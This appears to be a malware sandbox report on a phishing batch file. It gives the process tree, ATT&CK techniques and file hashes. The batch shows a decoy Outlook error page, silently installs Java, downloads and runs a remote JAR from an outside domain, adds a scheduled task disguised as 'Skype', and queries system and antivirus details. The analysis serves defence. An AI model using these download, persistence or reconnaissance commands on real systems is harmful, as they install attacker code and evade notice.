912 2172 msedge.exe 93 PID 2172 wrote to memory of 912 2172 msedge.exe 93 PID 2172 wrote to memory of 912 2172 msedge.exe 93 PID 2172 wrote to memory of 912 2172 msedge.exe 93 PID 2172 wrote to memory of 912 2172 msedge.exe 93 PID 2172 wrote to memory of 912 2172 msedge.exe 93
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\esigned-document_eml.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2616 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$shell = New-Object -ComObject Shell.Application; $shell.MinimizeAll()"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4180
-
-
C:\Windows\system32\fsutil.exefsutil dirty query C:2⤵PID:1264
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$shell = New-Object -ComObject Shell.Application; $shell.MinimizeAll()"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'https://outlook.office365.com/Encryption/ErrorPage.aspx?src=3&code=11&be=SN6PR04MB4014&fe=JNAP275CA0040.ZAFP275.PROD.OUTLOOgK.COM&loc=en-US&itemID=E4E_M_e9df154a-e4b8-4486-8aec-7acceeb93fee'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1576 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://outlook.office365.com/Encryption/ErrorPage.aspx?src=3&code=11&be=SN6PR04MB4014&fe=JNAP275CA0040.ZAFP275.PROD.OUTLOOgK.COM&loc=en-US&itemID=E4E_M_e9df154a-e4b8-4486-8aec-7acceeb93fee3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb78dd46f8,0x7ffb78dd4708,0x7ffb78dd47184⤵PID:2476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,12339082147915161214,17233874444371162504,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:24⤵PID:3776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,12339082147915161214,17233874444371162504,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:2312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,12339082147915161214,17233874444371162504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2984 /prefetch:84⤵PID:912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,12339082147915161214,17233874444371162504,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:14⤵PID:4640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,12339082147915161214,17233874444371162504,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:14⤵PID:2148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,12339082147915161214,17233874444371162504,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4672 /prefetch:14⤵PID:4620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,12339082147915161214,17233874444371162504,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4980 /prefetch:84⤵PID:452
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,12339082147915161214,17233874444371162504,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4980 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:4564
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,12339082147915161214,17233874444371162504,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5032 /prefetch:14⤵PID:4788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,12339082147915161214,17233874444371162504,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:14⤵PID:2760
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,12339082147915161214,17233874444371162504,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5552 /prefetch:14⤵PID:4284
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,12339082147915161214,17233874444371162504,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1748 /prefetch:24⤵
- Suspicious behavior: EnumeratesProcesses
PID:5864
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://javadl.oracle.com/webapps/download/AutoDL?BundleId=250111_d8aa705069af427f9b83e66b34f5e380' -OutFile 'C:\Temp\JavaSetup8u421.exe'"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1016
-
-
C:\Temp\JavaSetup8u421.exe"C:\Temp\JavaSetup8u421.exe" /s INSTALL_SILENT=1 STATIC=12⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5036 -
C:\Users\Admin\AppData\Local\Temp\jds240617296.tmp\JavaSetup8u421.exe"C:\Users\Admin\AppData\Local\Temp\jds240617296.tmp\JavaSetup8u421.exe" "/s" "INSTALL_SILENT=1" "STATIC=1"3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4944 -
C:\Users\Admin\AppData\LocalLow\Oracle\Java\jre1.8.0_421\LZMA_EXE"C:\Users\Admin\AppData\LocalLow\Oracle\Java\jre1.8.0_421\LZMA_EXE" d "C:\Users\Admin\AppData\LocalLow\Oracle\Java\jre1.8.0_421\au.msi" "C:\Users\Admin\AppData\LocalLow\Oracle\Java\jre1.8.0_421\msi.tmp"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4316
-
-
C:\Users\Admin\AppData\LocalLow\Oracle\Java\jre1.8.0_421\LZMA_EXE"C:\Users\Admin\AppData\LocalLow\Oracle\Java\jre1.8.0_421\LZMA_EXE" d "C:\Users\Admin\AppData\LocalLow\Oracle\Java\jre1.8.0_421\jre1.8.0_421.msi" "C:\Users\Admin\AppData\LocalLow\Oracle\Java\jre1.8.0_421\msi.tmp"4⤵
- Executes dropped EXE
PID:452
-
-
C:\Program Files (x86)\Java\jre1.8.0_421\bin\javaw.exe-Djdk.disableLastUsageTracking -cp "C:\Program Files (x86)\Java\jre1.8.0_421\bin\..\lib\deploy.jar" com.sun.deploy.panel.ControlPanel -systemConfig deployment.expiration.check.enabled false4⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5972
-
-
-
-
C:\Windows\system32\timeout.exetimeout /t 45 /nobreak2⤵
- Delays execution with timeout.exe
PID:5056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://boyunglee.com/tert/tre2.jar' -OutFile 'C:\Temp\tre2.jar'"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2864
-
-
C:\Windows\system32\timeout.exetimeout /t 15 /nobreak2⤵
- Delays execution with timeout.exe
PID:5792
-
-
C:\Program Files (x86)\Java\jre1.8.0_421\bin\java.exe"C:\Program Files (x86)\Java\jre1.8.0_421\bin\java.exe" -jar "C:\Temp\tre2.jar"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5088 -
C:\Program Files (x86)\Java\jre1.8.0_421\bin\java.exe"C:\Program Files (x86)\Java\jre1.8.0_421\bin\java.exe" -jar "C:\Users\Admin\tre2.jar"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:5000 -
C:\Windows\SysWOW64\cmd.execmd /c schtasks /create /sc minute /mo 30 /tn Skype /tr "C:\Users\Admin\AppData\Roaming\tre2.jar"4⤵
- System Location Discovery: System Language Discovery
PID:5192 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 30 /tn Skype /tr "C:\Users\Admin\AppData\Roaming\tre2.jar"5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4664
-
-
-
C:\Program Files (x86)\Java\jre1.8.0_421\bin\java.exe"C:\Program Files (x86)\Java\jre1.8.0_421\bin\java.exe" -jar "C:\Users\Admin\AppData\Roaming\tre2.jar"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3564 -
C:\Windows\SysWOW64\cmd.execmd.exe /c "wmic /node:. /namespace:'\\root\cimv2' path win32_logicaldisk get volumeserialnumber /format:list"5⤵
- System Location Discovery: System Language Discovery
PID:5560 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /node:. /namespace:'\\root\cimv2' path win32_logicaldisk get volumeserialnumber /format:list6⤵
- System Location Discovery: System Language Discovery
PID:2280
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c "wmic /node:. /namespace:'\\root\cimv2' path win32_operatingsystem get caption,OSArchitecture /format:list"5⤵
- System Location Discovery: System Language Discovery
PID:2760 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /node:. /namespace:'\\root\cimv2' path win32_operatingsystem get caption,OSArchitecture /format:list6⤵
- System Location Discovery: System Language Discovery
PID:3504
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c "wmic /node:. /namespace:'\\root\cimv2' path win32_operatingsystem get version /format:list"5⤵
- System Location Discovery: System Language Discovery
PID:5620 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /node:. /namespace:'\\root\cimv2' path win32_operatingsystem get version /format:list6⤵
- System Location Discovery: System Language Discovery
PID:5652
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c "wmic /node:localhost /namespace:'\\root\securitycenter2' path antivirusproduct get displayname /format:list"5⤵
- System Location Discovery: System Language Discovery
PID:1292 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /node:localhost /namespace:'\\root\securitycenter2' path antivirusproduct get displayname /format:list6⤵
- System Location Discovery: System Language Discovery
PID:5776
-
-
-
-
-
-
C:\Windows\system32\timeout.exetimeout /t 5 /nobreak2⤵
- Delays execution with timeout.exe
PID:2680
-
-
C:\Program Files (x86)\Java\jre1.8.0_421\bin\java.exe"C:\Program Files (x86)\Java\jre1.8.0_421\bin\java.exe" -jar "C:\Temp\tre2.jar"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5324
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3900
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2088
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2416 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 32B4A23233BE7757F089D796A6F4C9762⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2440
-
-
C:\Program Files (x86)\Java\jre1.8.0_421\installer.exe"C:\Program Files (x86)\Java\jre1.8.0_421\installer.exe" /s INSTALLDIR="C:\Program Files (x86)\Java\jre1.8.0_421\\" STATIC=1 WEB_ANALYTICS=Disable EULA=Disable INSTALL_SILENT=1 AUTO_UPDATE=Disable SPONSORS=Disable REPAIRMODE=0 ProductCode={77924AE4-039E-4CA4-87B4-2F32180421F0}2⤵
- Executes dropped EXE
- Loads dropped DLL
- Installs/modifies Browser Helper Object
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Modifies data under HKEY_USERS
- Modifies registry class
PID:5900 -
C:\Program Files (x86)\Java\jre1.8.0_421\bin\javaw.exe"C:\Program Files (x86)\Java\jre1.8.0_421\bin\javaw.exe" -Xshare:dump -Djdk.disableLastUsageTracking3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:5192
-
-
C:\Program Files (x86)\Java\jre1.8.0_421\bin\ssvagent.exe"C:\Program Files (x86)\Java\jre1.8.0_421\bin\ssvagent.exe" -doHKCUSSVSetup3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:5256
-
-
C:\Program Files (x86)\Java\jre1.8.0_421\bin\javaws.exe"C:\Program Files (x86)\Java\jre1.8.0_421\bin\javaws.exe" -wait -fix -permissions -silent3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5268 -
C:\Program Files (x86)\Java\jre1.8.0_421\bin\jp2launcher.exe"C:\Program Files (x86)\Java\jre1.8.0_421\bin\jp2launcher.exe" -secure -javaws -jre "C:\Program Files (x86)\Java\jre1.8.0_421" -vma LWNsYXNzcGF0aABDOlxQcm9ncmFtIEZpbGVzICh4ODYpXEphdmFcanJlMS44LjBfNDIxXGxpYlxkZXBsb3kuamFyAC1EamF2YS5zZWN1cml0eS5wb2xpY3k9ZmlsZTpDOlxQcm9ncmFtIEZpbGVzICh4ODYpXEphdmFcanJlMS44LjBfNDIxXGxpYlxzZWN1cml0eVxqYXZhd3MucG9saWN5AC1EdHJ1c3RQcm94eT10cnVlAC1YdmVyaWZ5OnJlbW90ZQAtRGpubHB4LmhvbWU9QzpcUHJvZ3JhbSBGaWxlcyAoeDg2KVxKYXZhXGpyZTEuOC4wXzQyMVxiaW4ALURqYXZhLnNlY3VyaXR5Lm1hbmFnZXIALURzdW4uYXd0Lndhcm11cD10cnVlAC1YYm9vdGNsYXNzcGF0aC9hOkM6XFByb2dyYW0gRmlsZXMgKHg4NilcSmF2YVxqcmUxLjguMF80MjFcbGliXGphdmF3cy5qYXI7QzpcUHJvZ3JhbSBGaWxlcyAoeDg2KVxKYXZhXGpyZTEuOC4wXzQyMVxsaWJcZGVwbG95LmphcjtDOlxQcm9ncmFtIEZpbGVzICh4ODYpXEphdmFcanJlMS44LjBfNDIxXGxpYlxwbHVnaW4uamFyAC1EamF2YS5hd3QuaGVhZGxlc3M9dHJ1ZQAtRGpubHB4Lmp2bT1DOlxQcm9ncmFtIEZpbGVzICh4ODYpXEphdmFcanJlMS44LjBfNDIxXGJpblxqYXZhdy5leGU= -ma LXdhaXQALWZpeAAtcGVybWlzc2lvbnMALXNpbGVudAAtbm90V2ViSmF2YQ==4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2180
-
-
-
C:\Program Files (x86)\Java\jre1.8.0_421\bin\javaws.exe"C:\Program Files (x86)\Java\jre1.8.0_421\bin\javaws.exe" -wait -fix -shortcut -silent3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5676 -
C:\Program Files (x86)\Java\jre1.8.0_421\bin\jp2launcher.exe"C:\Program Files (x86)\Java\jre1.8.0_421\bin\jp2launcher.exe" -secure -javaws -jre "C:\Program Files (x86)\Java\jre1.8.0_421" -vma LWNsYXNzcGF0aABDOlxQcm9ncmFtIEZpbGVzICh4ODYpXEphdmFcanJlMS44LjBfNDIxXGxpYlxkZXBsb3kuamFyAC1EamF2YS5zZWN1cml0eS5wb2xpY3k9ZmlsZTpDOlxQcm9ncmFtIEZpbGVzICh4ODYpXEphdmFcanJlMS44LjBfNDIxXGxpYlxzZWN1cml0eVxqYXZhd3MucG9saWN5AC1EdHJ1c3RQcm94eT10cnVlAC1YdmVyaWZ5OnJlbW90ZQAtRGpubHB4LmhvbWU9QzpcUHJvZ3JhbSBGaWxlcyAoeDg2KVxKYXZhXGpyZTEuOC4wXzQyMVxiaW4ALURqYXZhLnNlY3VyaXR5Lm1hbmFnZXIALURzdW4uYXd0Lndhcm11cD10cnVlAC1YYm9vdGNsYXNzcGF0aC9hOkM6XFByb2dyYW0gRmlsZXMgKHg4NilcSmF2YVxqcmUxLjguMF80MjFcbGliXGphdmF3cy5qYXI7QzpcUHJvZ3JhbSBGaWxlcyAoeDg2KVxKYXZhXGpyZTEuOC4wXzQyMVxsaWJcZGVwbG95LmphcjtDOlxQcm9ncmFtIEZpbGVzICh4ODYpXEphdmFcanJlMS44LjBfNDIxXGxpYlxwbHVnaW4uamFyAC1EamF2YS5hd3QuaGVhZGxlc3M9dHJ1ZQAtRGpubHB4Lmp2bT1DOlxQcm9ncmFtIEZpbGVzICh4ODYpXEphdmFcanJlMS44LjBfNDIxXGJpblxqYXZhdy5leGU= -ma LXdhaXQALWZpeAAtc2hvcnRjdXQALXNpbGVudAAtbm90V2ViSmF2YQ==4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5692
-
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 8DD785D7AD0706DF166958A5D3FE3C89 E Global\MSI00002⤵
- System Location Discovery: System Language Discovery
PID:6104
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 11BB119BF286EFF8341A19D7E41FB9D02⤵
- System Location Discovery: System Language Discovery
PID:3636
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 4885ECEE76EC8CF228771A0C70203D07 E Global\MSI00002⤵
- System Location Discovery: System Language Discovery
PID:5500
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding DF500417E7C0C2E26CE81B3237EC2AF42⤵
- System Location Discovery: System Language Discovery
PID:5480
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 3ED9D2AF9BC80E04588AC85B53FE32DD E Global\MSI00002⤵
- System Location Discovery: System Language Discovery
PID:5148
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Browser Extensions
1Event Triggered Execution
1Component Object Model Hijacking
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Component Object Model Hijacking
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
758KB
MD5ee4ff196f02747a2a9c6e2dbafe9804e
SHA1dc27bb6544f44568855a55605e10070cbac2083d
SHA2566a54ffff691cfa76ee70666202c101dfc6e595f9285b30715e843752777cc1c2
SHA5128db35610195dd9cd8c0b651fb7f1737b6380a29a208b5294ac3bbffe76dcbafe526c2f2d437b523f74cdd958def5bcd5da6b33fb7b431e7b0367de86c0dc6b32
-
Filesize
7KB
MD5efa3a2e0a15958ea0e83c42342864abd
SHA1651389581597cbd66ece95913f2f80be2a60c316
SHA256e70ab5926d15b6c3639c7fb541a8e8741ab8942f78607faf0bbb93010dd7bbbd
SHA512a220cf9db8aa9582d94987703501d83ffaf9b6b3174921dd15f89f0182cc29cf6bbc5572888a9dccc5f2c859f284679f6e58de7b2d8db02966d7636e23fec4f3
-
Filesize
8KB
MD54e8f9527cc67bee617a1aba37141ea5a
SHA1b3c1ebb6b3cea395c36c529f2c3e25be58a99e86
SHA25617ecf7a81acbc79f70c553edb70ba76bb1d9544dffe4136f1315bf3ab302065a
SHA5122353ac87d3b06097ed7c31e96a3e80305172ddbe5ada18721dfd7ce3b316726c60c69299aa2d56cb907cd47d1b05a0d71d7ed029f0c3eb9365ddd63f809c3528
-
Filesize
263KB
MD5c806e01dc949208cbc60e91215452bcc
SHA133ba8b3fb87c61cac2548dd738ab1d566babeafa
SHA256945b7922e238f35030413fecd3b8135ac1869c690d4f965b33bb006407a55e02
SHA512034ae43582ea4d41335b2a87771e0ab5d0ad4036f05bc87101fb54663933e2e637ff511e41d423d1a63f10cae4937accd08097e9584369338478e01c0efb395a
-
Filesize
910KB
MD58aa30ef483235aa407cd60e6a062688b
SHA1f69ddfbb7532d04ec8ed62acf750624daa71a912
SHA2567b1f81f1e22c973b6bdfb2acbfc40449b76e9cbdef42fea7bcad3fe4484f20f6
SHA51279d4a152cdd3be4f253135f3a693d6e94233d13d0284a3e9150bfc1f178b268ec41ae3b22ed4518fefb37a45d5d041ef59c2e51113305285298c6bab88414068
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java Development Kit\Reference Documentation.url
Filesize193B
MD505a8bfa71a5f65da68bc09688a9b30c7
SHA11620484f5210e0e719d0363d1672501404d57bbe
SHA256ee55ddf4cda30cd0f0fdb4fc2d0bf9ecca5dae113d1eddd9b935de8cc7ff432f
SHA512adf9dcc60912800a0a6d5884cdcdabd82e7fda43ceb49258264cf5d02fe402d36720319fe5b386f5719eb5ba7305fdb8568d126d0264402d84fffae247a49a04
-
Filesize
188B
MD55abae3d5854c92e8752bb8d260680bfc
SHA1b777409d05cc97359706894c6e07908805600c4e
SHA2563701e2cb4fc36828ce7109a4078c3fca48bc03fc42084db0355bc8dd5b13ca20
SHA512a5cc26ac22ee4c727294017b1c66327973b56fbb7881672fc0353ee4047bfeacb5f5839287e462dcbc02660659e462ab284cddf2a5de63e558b6859164516fef
-
Filesize
184B
MD5a49490ad04457a8ad76ecec28c3740e1
SHA1c9b6aabef9a7f88ca8c8e539d1ff2f1311fd3005
SHA2563d324cbf543e814d5fc46655530ad7f532f426283ccc355d68ac23126d122ee9
SHA512df7227e080637d8570475856e1537b832611492d071eba357b8b42391e6673fad5c2e1388c370f861162c1ef0c6250e3dffc7769244aa7babbe8fdb40e6d0871
-
Filesize
2.3MB
MD51d8060e1141d99a121ee491dd3120d5a
SHA16a341d7d7ee1b913c2baf18cd9b50debccc6a336
SHA256e924ff6d5a50e9396a6ad943027ae55c6c9355558b6bdc7d0b2bead0daf88c1e
SHA51224817b2a4832ca9255e2de59114ef1cc6413cf4fdcba7fb847c1d50df9aab33a6d6fbb6e600254bb4219037e33f442099ce94f3453f0ac821302112f19e47a2e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
Filesize471B
MD54930dde6a08da80f8ce90ed25b71aefe
SHA1e7df26f81c01ed1994c04ca1475788ff66092873
SHA2567c4d925176f7d6ac431eb5d40950a2fe113fee022f26d27891174f944a3013a9
SHA512103b09c88f566fd7d825a9a64992fd6fb1170c2b8fe57f1fa951e1bad58dcdbdd6c94bdd6b819a61bd513e968ad49497963093d9301f0b091a8b979296d6a48c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_D2F6556190F7B1A25A117FFB5467EEBD
Filesize727B
MD540a82f86ea41ef19d8e61c6e097a3ffc
SHA1cf1411bb7ef74323b4fdd8e2a4381409118af926
SHA256a356ce94ed70d80bad0e914feb79345331ab962f50e2fab453995df466b73208
SHA5125296939e9d7cb4505dbfba1905d696e3175c47b7e92ed174d6b95acd37e03ecfae23153f1658ff1f6dd86451c02c13f32aba186ed62c75ff517e498a641f4adf
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
Filesize727B
MD5c4f75f06f0e3c76ff4bf45dcc5e611b5
SHA18c8824b53f1e2632bea2198b0caa57a57491850e
SHA256e506906848bf5c685c17d3ad63865ef286055b93a969c627e296a0460c9dfd82
SHA512ef61c254dfb305f566b81003cdd73eb9aa90deb2afa7df0ba0efcd7b5eb71ceb93b20f33f4ec26e4c5105bdaeae855c52466f753c62430209e54aff7dad667cb
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
Filesize400B
MD5c8613214afdf1e9b79368043289f13aa
SHA1d918e2c551f03c533dc7363d2cd09199897dc0d9
SHA256fff5a9aac8bcff65cb4bea8e970a5de906acfba74c2286e9583431c7c47f6990
SHA5121fde208ceca388630bc53748a95dd4026c08f0716ce9a5f171393afe8ae89ebc5f11e615fec300832012e51f5e3022ae3736221f4d7da4cec6dd585a534ca0f0
-
